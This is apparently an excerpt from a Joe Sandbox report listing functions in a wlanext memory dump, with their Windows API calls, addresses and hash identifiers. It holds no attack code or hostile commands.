                                                                                • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,SetDefaultKey,00000000,00000000), ref: 00C0FE94
                                                                                • NtDeviceIoControlFile.NTDLL ref: 00C0FEB7
                                                                                • NtWaitForSingleObject.NTDLL ref: 00C0FECA
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00C0FEDA
                                                                                • RtlNtStatusToDosError.NTDLL ref: 00C0FF00
                                                                                • SetLastError.KERNEL32(00000000), ref: 00C0FF07
                                                                                • GetLastError.KERNEL32 ref: 00C0FF0D
                                                                                • RtlNtStatusToDosError.NTDLL ref: 00C0FF21
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: Error$LastStatus$CloseControlCreateDeviceEventFileHandleObjectSingleWaitmemcpymemset
                                                                                • String ID:
                                                                                • API String ID: 1185699691-0
                                                                                • Opcode ID: 5cca5f801921e455b3834bc9a93feae870486003b5630d55bab74c0701b4936b
                                                                                • Instruction ID: 20c016318006199e00fc72f414bfa87623e9686ce7e00cd35a91600b3c48efa4
                                                                                • Opcode Fuzzy Hash: 5cca5f801921e455b3834bc9a93feae870486003b5630d55bab74c0701b4936b
                                                                                • Instruction Fuzzy Hash: 6A41C272900115AFCB21DFA8DC84A9FBBB8EF89710F154069F915E7351D3709D81DBA0
                                                                                Function 00C0FF3F Relevance: 15.1, APIs: 10, Instructions: 135nativefileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • memset.MSVCRT ref: 00C0FF82
                                                                                • memcpy.MSVCRT ref: 00C0FFD6
                                                                                • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 00C0FFE8
                                                                                • NtDeviceIoControlFile.NTDLL ref: 00C1000C
                                                                                • NtWaitForSingleObject.NTDLL ref: 00C10021
                                                                                • CloseHandle.KERNEL32(?), ref: 00C10033
                                                                                • RtlNtStatusToDosError.NTDLL ref: 00C10059
                                                                                • SetLastError.KERNEL32(00000000), ref: 00C10060
                                                                                • GetLastError.KERNEL32 ref: 00C10066
                                                                                • RtlNtStatusToDosError.NTDLL ref: 00C1007A
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: Error$LastStatus$CloseControlCreateDeviceEventFileHandleObjectSingleWaitmemcpymemset
                                                                                • String ID:
                                                                                • API String ID: 1185699691-0
                                                                                • Opcode ID: 3fdb3a8f333c6d490fef1a0af90daad3a3c7b81156ceb621ade5634d7026d4ee
                                                                                • Instruction ID: bd8367dee7e38bf2602efb3e6747a1ed020e2dd937c1b14ab4a8bc556637d21f
                                                                                • Opcode Fuzzy Hash: 3fdb3a8f333c6d490fef1a0af90daad3a3c7b81156ceb621ade5634d7026d4ee
                                                                                • Instruction Fuzzy Hash: A2417071900214AFCB15DF68C884AAEFBB9FF89310B158169FD15EB211D7709E80DBA0
                                                                                Function 00C0FCA0 Relevance: 15.1, APIs: 10, Instructions: 126nativefileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • memset.MSVCRT ref: 00C0FCFC
                                                                                • memcpy.MSVCRT ref: 00C0FD22
                                                                                • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000004,00000000,00000000), ref: 00C0FD34
                                                                                • NtDeviceIoControlFile.NTDLL ref: 00C0FD56
                                                                                • NtWaitForSingleObject.NTDLL ref: 00C0FD6B
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00C0FD7D
                                                                                • RtlNtStatusToDosError.NTDLL ref: 00C0FDA3
                                                                                • SetLastError.KERNEL32(00000000,?,?,00000004,00000000,00000000), ref: 00C0FDAA
                                                                                • GetLastError.KERNEL32(?,?,00000004,00000000,00000000), ref: 00C0FDB0
                                                                                • RtlNtStatusToDosError.NTDLL ref: 00C0FDC4
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: Error$LastStatus$CloseControlCreateDeviceEventFileHandleObjectSingleWaitmemcpymemset
                                                                                • String ID:
                                                                                • API String ID: 1185699691-0
                                                                                • Opcode ID: 3fbb66f8df97f416c31e7dd182f0dc50176ef8f44a8ef4d9cf326bac010809e1
                                                                                • Instruction ID: 638c23fbdbc75bd0b6cd1da49d6264321a4d913cc445eb756860c0ceb99d14af
                                                                                • Opcode Fuzzy Hash: 3fbb66f8df97f416c31e7dd182f0dc50176ef8f44a8ef4d9cf326bac010809e1
                                                                                • Instruction Fuzzy Hash: CA41BF31900215AFDB25AF64CC88AAEBBB9EB85300B15046DFD52E7291E6709D91DBA0
                                                                                Function 00C10096 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 71nativefileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,NicSpecificExtension), ref: 00C100B5
                                                                                • NtDeviceIoControlFile.NTDLL ref: 00C100D9
                                                                                • NtWaitForSingleObject.NTDLL ref: 00C100EE
                                                                                • CloseHandle.KERNEL32(?), ref: 00C10100
                                                                                • RtlNtStatusToDosError.NTDLL ref: 00C1012F
                                                                                • SetLastError.KERNEL32(00000000), ref: 00C10136
                                                                                • GetLastError.KERNEL32 ref: 00C1013C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: Error$Last$CloseControlCreateDeviceEventFileHandleObjectSingleStatusWait
                                                                                • String ID: NicSpecificExtension
                                                                                • API String ID: 537682033-2025226827
                                                                                • Opcode ID: 30fe343808538f93ce6080c4ae7ff0497f917b103290450f4477bbaf62a0cf36
                                                                                • Instruction ID: 8a159fec038cebe10a9a0d461c2e4cab01fe16fd2fb0a996cf189883a6a6ab39
                                                                                • Opcode Fuzzy Hash: 30fe343808538f93ce6080c4ae7ff0497f917b103290450f4477bbaf62a0cf36
                                                                                • Instruction Fuzzy Hash: 8021A235600128BFCB149F65DC48EDFBF7AEF8A7A0B254014F91697210D7709D80EBA0
                                                                                Function 00C0359A Relevance: 13.6, APIs: 9, Instructions: 149COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • memset.MSVCRT ref: 00C035F9
                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,00000004,?), ref: 00C03628
                                                                                • GetLastError.KERNEL32 ref: 00C03632
                                                                                • GetCurrentProcess.KERNEL32(00000028,00000004), ref: 00C0364E
                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00C03655
                                                                                • GetLastError.KERNEL32 ref: 00C0365F
                                                                                • AdjustTokenPrivileges.ADVAPI32(00000004,00000000,?,00000100,00000000,00000000), ref: 00C036ED
                                                                                • GetLastError.KERNEL32 ref: 00C036F7
                                                                                  • Part of subcall function 00C02CE5: TraceMessage.ADVAPI32(?,?,0000002B,?,?,00000000), ref: 00C02CFA
                                                                                • CloseHandle.KERNEL32(?), ref: 00C03745
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$ProcessToken$AdjustCloseCurrentHandleLookupMessageOpenPrivilegePrivilegesTraceValuememset
                                                                                • String ID:
                                                                                • API String ID: 3257177247-0
                                                                                • Opcode ID: c5e7edcef762e92e18469e025c9fb1fa340a984e11a0aaa2dd9ec0819f15163d
                                                                                • Instruction ID: f951bfd1059dba14ff5965d1f16bd9c8595f4fd1c02b87271ffd25bcc47ab4f9
                                                                                • Opcode Fuzzy Hash: c5e7edcef762e92e18469e025c9fb1fa340a984e11a0aaa2dd9ec0819f15163d
                                                                                • Instruction Fuzzy Hash: 10517DB4A04284BEEF169F98CD48F9DBBBAEB05304F154195F9519A1F1C3B1CB90EB44
                                                                                Function 00C1014C Relevance: 12.1, APIs: 8, Instructions: 119nativefileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00C10411: GetProcessHeap.KERNEL32(00C12000,?,00C0A35D,00000000,00000000,00C01680,00C12000,?,?,00C03176,00000014,?,?,00C120A0,?,00000002), ref: 00C10419
                                                                                  • Part of subcall function 00C10411: HeapAlloc.KERNEL32(00000000,00000008,00000000,?,00C0A35D,00000000,00000000,00C01680,00C12000,?,?,00C03176,00000014,?,?,00C120A0), ref: 00C10429
                                                                                  • Part of subcall function 00C10411: SetLastError.KERNEL32(00000008,?,00C0A35D,00000000,00000000,00C01680,00C12000,?,?,00C03176,00000014,?,?,00C120A0,?,00000002), ref: 00C10437
                                                                                • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,00000000,0000001C,00000000,00000000,00000000,?), ref: 00C101C9
                                                                                • NtDeviceIoControlFile.NTDLL ref: 00C101EC
                                                                                • NtWaitForSingleObject.NTDLL ref: 00C10201
                                                                                • CloseHandle.KERNEL32(?), ref: 00C10213
                                                                                • RtlNtStatusToDosError.NTDLL ref: 00C1025A
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorHeap$AllocCloseControlCreateDeviceEventFileHandleLastObjectProcessSingleStatusWait
                                                                                • String ID:
                                                                                • API String ID: 2851205432-0
                                                                                • Opcode ID: 2e2777b77ca6e3b7c4451644fc0acf43f184a4a3f7e5e891066bc4055c442792
                                                                                • Instruction ID: c14840952f7ec37bce7e084fda778aec07260dd4357d5b2e93194dec3b7135b0
                                                                                • Opcode Fuzzy Hash: 2e2777b77ca6e3b7c4451644fc0acf43f184a4a3f7e5e891066bc4055c442792
                                                                                • Instruction Fuzzy Hash: A041E532600114AFDB15CF64CC89BAEBBA6EF89760F298068FD15DB245D6B0DD81DB90
                                                                                Function 00C0BA7B Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 183COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RpcBindingToStringBindingW.RPCRT4(?,?), ref: 00C0BACE
                                                                                • RpcStringBindingParseW.RPCRT4(?,00000000,?,00000000,00000000,00000000), ref: 00C0BB1D
                                                                                • RpcBindingInqAuthClientW.RPCRT4(?,?,00000000,?,?,00000000), ref: 00C0BBCB
                                                                                  • Part of subcall function 00C02CE5: TraceMessage.ADVAPI32(?,?,0000002B,?,?,00000000), ref: 00C02CFA
                                                                                • RpcStringFreeW.RPCRT4(?,?), ref: 00C0BC4B
                                                                                • RpcStringFreeW.RPCRT4(00000000,?), ref: 00C0BC57
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: BindingString$Free$AuthClientMessageParseTrace
                                                                                • String ID: ncalrpc
                                                                                • API String ID: 4215684144-2983622238
                                                                                • Opcode ID: 9589657860fa35cd6887934dbe3707839f8e8f662c08f1cd6025d522c061c4a2
                                                                                • Instruction ID: 56bd19fb71cd022fe9b248786312647039d0b8821e205acc5604a476b7f02d4b
                                                                                • Opcode Fuzzy Hash: 9589657860fa35cd6887934dbe3707839f8e8f662c08f1cd6025d522c061c4a2
                                                                                • Instruction Fuzzy Hash: 2E618C70905248AFEB29CF58C848FAEBBBABF05B04F54409AE511962E1C771CF80DB50
                                                                                Function 00C08188 Relevance: 7.6, APIs: 5, Instructions: 89COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(00C124E0,?,00000000,00C01680,?,?,00C04047), ref: 00C081C9
                                                                                • LeaveCriticalSection.KERNEL32(00C124E0,?,00000000,00C01680,?,?,00C04047), ref: 00C081D6
                                                                                • RpcMgmtWaitServerListen.RPCRT4 ref: 00C081DC
                                                                                • EnterCriticalSection.KERNEL32(00C124E0,?,00000000,00C01680,?,?,00C04047), ref: 00C081E6
                                                                                • LeaveCriticalSection.KERNEL32(00C124E0,?,00000000,00C01680,?,?,00C04047), ref: 00C08267
                                                                                  • Part of subcall function 00C02CE5: TraceMessage.ADVAPI32(?,?,0000002B,?,?,00000000), ref: 00C02CFA
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterLeave$ListenMessageMgmtServerTraceWait
                                                                                • String ID:
                                                                                • API String ID: 4262553498-0
                                                                                • Opcode ID: d1dc61c7c61b81d1f3c8e85b5307626caf6d54b738ec467a874c5a1321f891b5
                                                                                • Instruction ID: cfa6bf95e8776e07f2afe692e038bdd979825e5ed4e377cf77ee1b8cfb0e6c25
                                                                                • Opcode Fuzzy Hash: d1dc61c7c61b81d1f3c8e85b5307626caf6d54b738ec467a874c5a1321f891b5
                                                                                • Instruction Fuzzy Hash: 3C31B334144644EFEB198F50DD48F8DBBA6BB49304F1581A4F951571F2C7B1CA99EB00
                                                                                Function 00C09186 Relevance: 7.5, APIs: 5, Instructions: 49timethreadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00C091BD
                                                                                • GetCurrentProcessId.KERNEL32 ref: 00C091C9
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00C091D1
                                                                                • GetTickCount.KERNEL32 ref: 00C091D9
                                                                                • QueryPerformanceCounter.KERNEL32(?), ref: 00C091E5
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                • String ID:
                                                                                • API String ID: 1445889803-0
                                                                                • Opcode ID: 1e4f0f2432fef30968af22f6eef328b2447164bd5924789363ac8ed4ba5d042a
                                                                                • Instruction ID: 5b6e140a1e1e1c1922b428b1e07e81400c4ee914c05fc0ab3a2eb6a64ff3895b
                                                                                • Opcode Fuzzy Hash: 1e4f0f2432fef30968af22f6eef328b2447164bd5924789363ac8ed4ba5d042a
                                                                                • Instruction Fuzzy Hash: 8A018B76D002249BCB20EBB9E84C79EF7F8FB4C345F464665E811E7250DB309A51CB90
                                                                                Function 00C082A4 Relevance: 6.1, APIs: 4, Instructions: 83COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(00C124E0,00C01680,00000000,00C120B0,?,?,00C03866,00C120B0,00C120A0), ref: 00C082E0
                                                                                • LeaveCriticalSection.KERNEL32(00C124E0,?,?,00C03866,00C120B0,00C120A0), ref: 00C08317
                                                                                • LeaveCriticalSection.KERNEL32(00C124E0,?,?,00C03866,00C120B0,00C120A0), ref: 00C08356
                                                                                • RpcMgmtStopServerListening.RPCRT4(00000000), ref: 00C0835E
                                                                                  • Part of subcall function 00C02CE5: TraceMessage.ADVAPI32(?,?,0000002B,?,?,00000000), ref: 00C02CFA
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$Leave$EnterListeningMessageMgmtServerStopTrace
                                                                                • String ID:
                                                                                • API String ID: 4211997807-0
                                                                                • Opcode ID: f22dcc1a9c3a075ed30e30e0d6058559c2456217f16f129d5cd58a784353d1e2
                                                                                • Instruction ID: 1ab609f4a6f324a96f09073240b670b0ea26f135b8a3a136fd13cc5bd6bf0c38
                                                                                • Opcode Fuzzy Hash: f22dcc1a9c3a075ed30e30e0d6058559c2456217f16f129d5cd58a784353d1e2
                                                                                • Instruction Fuzzy Hash: 3F21E470100650AFFB2A4B04DC4CF9ABE56BB4AB48F198194F9415B1F2CB61CE89DB54
                                                                                Function 00C08F22 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetUnhandledExceptionFilter.KERNEL32 ref: 00C092E4
                                                                                • UnhandledExceptionFilter.KERNEL32(00C01C48), ref: 00C092EF
                                                                                • GetCurrentProcess.KERNEL32(C0000409), ref: 00C092FA
                                                                                • TerminateProcess.KERNEL32(00000000), ref: 00C09301
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                • String ID:
                                                                                • API String ID: 3231755760-0
                                                                                • Opcode ID: 36645996932e6e8b35862b2d469dd28af4e6d1bc9e459e6e71283e1db55df8df
                                                                                • Instruction ID: c75a1affd773ffa5ae94b560585bff132182760fd9ada5637e9868aee4b775f9
                                                                                • Opcode Fuzzy Hash: 36645996932e6e8b35862b2d469dd28af4e6d1bc9e459e6e71283e1db55df8df
                                                                                • Instruction Fuzzy Hash: 6521BDBD805284DBC714DF69E984BCC7BA4FB4A324B10D11AEA0883371E3B459A2CF05
                                                                                Function 00C088EE Relevance: 4.6, APIs: 3, Instructions: 109COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(00C124E0,?,00C120C0,00C01680,?,?,?,?,00C03F58), ref: 00C0896E
                                                                                • RpcServerListen.RPCRT4(00000001,000004D2,00000001), ref: 00C089B1
                                                                                • LeaveCriticalSection.KERNEL32(00C124E0,?,?,?,?,?,?,?,?,00C03F58), ref: 00C089F5
                                                                                  • Part of subcall function 00C02CE5: TraceMessage.ADVAPI32(?,?,0000002B,?,?,00000000), ref: 00C02CFA
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterLeaveListenMessageServerTrace
                                                                                • String ID:
                                                                                • API String ID: 3976739133-0
                                                                                • Opcode ID: d35b0d9456d84eab3a515a89de8a95185cf505a428730eb461e59e63d1474d1b
                                                                                • Instruction ID: e3060a2ebf981d0310e05d8000904ed8cd80dff7a3fc848c61a2411dc9a84e44
                                                                                • Opcode Fuzzy Hash: d35b0d9456d84eab3a515a89de8a95185cf505a428730eb461e59e63d1474d1b
                                                                                • Instruction Fuzzy Hash: 3D312831640250ABE726EF249C09FAE7A52BB06744F058250FD817B1E3CBB1CDA8D799
                                                                                Function 00C0B425 Relevance: 4.6, APIs: 3, Instructions: 82COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RpcEpUnregister.RPCRT4(?,?,00C01C38), ref: 00C0B466
                                                                                • RpcServerUnregisterIfEx.RPCRT4(?,00000000,00000000), ref: 00C0B496
                                                                                • RpcBindingVectorFree.RPCRT4(00C1249C), ref: 00C0B4D9
                                                                                  • Part of subcall function 00C02CE5: TraceMessage.ADVAPI32(?,?,0000002B,?,?,00000000), ref: 00C02CFA
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: Unregister$BindingFreeMessageServerTraceVector
                                                                                • String ID:
                                                                                • API String ID: 1810007982-0
                                                                                • Opcode ID: 5ad3befebb8311ce597d16d64eb6829798008f98bf8bf25d7d1231447dc76c1c
                                                                                • Instruction ID: 76ad9c4ced506a2bf2111423a5f1700c8374ca2104b89edb13c31c69f45baa82
                                                                                • Opcode Fuzzy Hash: 5ad3befebb8311ce597d16d64eb6829798008f98bf8bf25d7d1231447dc76c1c
                                                                                • Instruction Fuzzy Hash: 2E21A031200244BFEB2ACF54DC48F9A7F66BB0A744F158098FA154A1F3C3A1CEA5DB54
                                                                                Function 00C10449 Relevance: 2.5, APIs: 2, Instructions: 14memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetProcessHeap.KERNEL32(?,00C0A419,00000000,00000000,00C01680,?,00C031A6,?,00C120A0,?,00000002,00000000,00000001,?), ref: 00C1044E
                                                                                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00C1045E
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$FreeProcess
                                                                                • String ID:
                                                                                • API String ID: 3859560861-0
                                                                                • Opcode ID: 3afa19d5137acf72a3d40af1f8190ce1ffa36b4f9705cf807352801adc5aba5a
                                                                                • Instruction ID: 7dc0b82dcea408cb8d4ab38327f6a7d343fbb928613f3aa7290b74c949df69f6
                                                                                • Opcode Fuzzy Hash: 3afa19d5137acf72a3d40af1f8190ce1ffa36b4f9705cf807352801adc5aba5a
                                                                                • Instruction Fuzzy Hash: F0D01271644248AFE7601BA15C08B9B7A9C9B40741FA94015BF09C5050EAB0D5D1E564
                                                                                Function 00C0AF1E Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RpcBindingFree.RPCRT4(?), ref: 00C0AF56
                                                                                  • Part of subcall function 00C02CE5: TraceMessage.ADVAPI32(?,?,0000002B,?,?,00000000), ref: 00C02CFA
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: BindingFreeMessageTrace
                                                                                • String ID:
                                                                                • API String ID: 273605667-0
                                                                                • Opcode ID: b37cbedd35ef252be3852a465b3b6452d1ac34b0ee281367a4b6bece19efb48e
                                                                                • Instruction ID: baff4f2a509eb90521b80d2bc0da3c8121f4742b813888301c6be41bb3ed5539
                                                                                • Opcode Fuzzy Hash: b37cbedd35ef252be3852a465b3b6452d1ac34b0ee281367a4b6bece19efb48e
                                                                                • Instruction Fuzzy Hash: AF11C4B12003417FEB2A8F99DC4CF9ABF56AF42758F0941A4FA004A1F2C3A1CD95D756
                                                                                Function 00C08F8B Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetUnhandledExceptionFilter.KERNEL32 ref: 00C08F90
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled
                                                                                • String ID:
                                                                                • API String ID: 3192549508-0
                                                                                • Opcode ID: 7fe5098987e6e1164550a9ad0cb7c5272a3f8c8d9fd8319e0538f3277c8c63a2
                                                                                • Instruction ID: 9f718ede54a7e0a940bfa40d96693883559f5eb0f5a79ac9d2edea3736bb2ed2
                                                                                • Opcode Fuzzy Hash: 7fe5098987e6e1164550a9ad0cb7c5272a3f8c8d9fd8319e0538f3277c8c63a2
                                                                                • Instruction Fuzzy Hash: ED9002642511428AE60017F15D0AA09A5D55A58706746D4A16482C4194DE614145D525
                                                                                Function 00C0C953 Relevance: .1, Instructions: 73COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: MessageTrace
                                                                                • String ID:
                                                                                • API String ID: 471583391-0
                                                                                • Opcode ID: 2ff54aa0c06d8751c0857ac414117bcfe4e0dd556949789c328295b47112287e
                                                                                • Instruction ID: a3c67b7bc65b084db5678bfe6d30d63649095f62525355f03ad36f89e91897e5
                                                                                • Opcode Fuzzy Hash: 2ff54aa0c06d8751c0857ac414117bcfe4e0dd556949789c328295b47112287e
                                                                                • Instruction Fuzzy Hash: DB21A471640304AFEB16DF98C8C5F99B7A5AF04348F2441A9E9019B2E1D7B1DE44DB54
                                                                                Function 00C06142 Relevance: 31.8, APIs: 15, Strings: 3, Instructions: 305libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(00C12500), ref: 00C06193
                                                                                • LeaveCriticalSection.KERNEL32(00C12500), ref: 00C061E3
                                                                                • LoadLibraryW.KERNEL32(?), ref: 00C061EC
                                                                                • GetLastError.KERNEL32 ref: 00C061F9
                                                                                • GetProcAddress.KERNEL32(?,Dot11ExtIhvGetVersionInfo), ref: 00C06242
                                                                                • GetProcAddress.KERNEL32(?,Dot11ExtIhvInitService), ref: 00C0628E
                                                                                • GetLastError.KERNEL32 ref: 00C06297
                                                                                • GetProcAddress.KERNEL32(?,Dot11ExtIhvInitVirtualStation), ref: 00C062D0
                                                                                • memset.MSVCRT ref: 00C0634B
                                                                                • memset.MSVCRT ref: 00C0636E
                                                                                • EnterCriticalSection.KERNEL32(00C12500,00000002,Dot11ExtIhvInitService,00000000,00000000,?,00000058,?), ref: 00C06412
                                                                                  • Part of subcall function 00C0F8F1: TraceMessage.ADVAPI32(?,00000000,0000002B,?,?,?,00000004,00000000,?,00C09358,00C01634,00C01610,0000000A,00C01C50,?,?), ref: 00C0F90C
                                                                                • GetLastError.KERNEL32 ref: 00C0624B
                                                                                  • Part of subcall function 00C02CE5: TraceMessage.ADVAPI32(?,?,0000002B,?,?,00000000), ref: 00C02CFA
                                                                                • FreeLibrary.KERNEL32(?,00000002,Dot11ExtIhvGetVersionInfo,00000000,00000000), ref: 00C064AF
                                                                                • EnterCriticalSection.KERNEL32(00C12500,00000002,Dot11ExtIhvGetVersionInfo,00000000,00000000), ref: 00C064BA
                                                                                • LeaveCriticalSection.KERNEL32(00C12500), ref: 00C064CF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$AddressEnterErrorLastProc$LeaveLibraryMessageTracememset$FreeLoad
                                                                                • String ID: Dot11ExtIhvGetVersionInfo$Dot11ExtIhvInitService$Dot11ExtIhvInitVirtualStation
                                                                                • API String ID: 564754700-37986322
                                                                                • Opcode ID: 40a3d4fb946d96ebd837052fe59126f26dd347f9e526534a798228f2da71f924
                                                                                • Instruction ID: 7259a05006a026c235662377bfbef2bfa6bdfcf0acb58a0605e6a62ecaff7b2c
                                                                                • Opcode Fuzzy Hash: 40a3d4fb946d96ebd837052fe59126f26dd347f9e526534a798228f2da71f924
                                                                                • Instruction Fuzzy Hash: 99B19F74900214BFEB169FA4DC49F9EBE66AF09754F158061F950A61E2C7B0CFA0EF90
                                                                                Function 02068788 Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                • WindowsExcludedProcs, xrefs: 020687C1
                                                                                • Kernel-MUI-Number-Allowed, xrefs: 020687E6
                                                                                • Kernel-MUI-Language-SKU, xrefs: 020689FC
                                                                                • Kernel-MUI-Language-Allowed, xrefs: 02068827
                                                                                • Kernel-MUI-Language-Disallowed, xrefs: 02068914
                                                                                Memory Dump Source
